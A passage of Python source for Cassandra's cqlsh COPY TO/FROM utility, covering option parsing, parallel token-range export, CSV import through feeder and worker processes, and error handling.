Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.items()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = ensure_str(opts.pop('quote', '"'))
dialect_options['escapechar'] = ensure_str(opts.pop('escape', '\\'))
dialect_options['delimiter'] = ensure_str(opts.pop('delimiter', ','))
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = ensure_str(opts.pop('null', ''))
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [ensure_str(s.strip()) for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On platforms using 'spawn' as the default multiprocessing start method,
this dictionary must be picklable.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug,
coverage=shell.coverage,
coveragerc_path=shell.coveragerc_path
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = int(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow([ensure_str(c) for c in self.columns])
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'w'), close=True)
self.num_files += 1
return ret
except IOError as e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate([_f for _f in data.split(os.linesep) if _f]):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = int(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = int(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = "[" + ", ".join(self.columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in range(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if curr < begin_token:
return None
elif (prev is None) or (prev < begin_token):
ret = (begin_token, curr)
if end_token:
if (ret[0] is not None) and (ret[0] > end_token):
return None
elif (curr is not None) and (curr > end_token):
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = list(shell.get_ring(self.ks).items())
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
elif previous is None and (not end_token or previous < end_token):
previous = begin_token if begin_token else min_token
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this cases we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, list(ranges.keys()))
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # might be initialised directly here? (see CASSANDRA-17350)
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'r')
except IOError as e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = next(self.sources)
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
next(self.current_source)
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in range(min(max_rows, self.chunk_size)):
try:
row = next(self.current_source)
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return [_f for _f in rows if _f]
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in range(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
columns = "[" + ", ".join(self.valid_columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
shell.printerr(str(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print()
def import_records(self):
"""
Keep on running until we have stuff to receive or send and until all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
receive check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records() - self.error_handler.num_rows_failed,
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options):
super(FeedingProcess, self).__init__(target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.outmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.worker_channels = None # might be initialised directly here? (see CASSANDRA-17350)
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = [c for c in channels if c.num_pending() < max_pending_chunks]
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
An child worker process, this is for common functionality between ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
super(ChildProcess, self).__init__(target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.outmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
# attributes for coverage
self.coverage = params['coverage']
self.coveragerc_path = params['coveragerc_path']
self.coverage_collection = None
self.sigterm_handler = None
self.sighup_handler = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
def start_coverage(self):
import coverage
self.coverage_collection = coverage.Coverage(config_file=self.coveragerc_path)
self.coverage_collection.start()
# save current handlers for SIGTERM and SIGHUP
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sighup_handler = signal.getsignal(signal.SIGTERM)
def handle_sigterm():
self.stop_coverage()
self.close()
self.terminate()
# set custom handler for SIGHUP and SIGTERM
# needed to make sure coverage data is saved
signal.signal(signal.SIGTERM, handle_sigterm)
signal.signal(signal.SIGHUP, handle_sigterm)
def stop_coverage(self):
self.coverage_collection.stop()
self.coverage_collection.save()
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
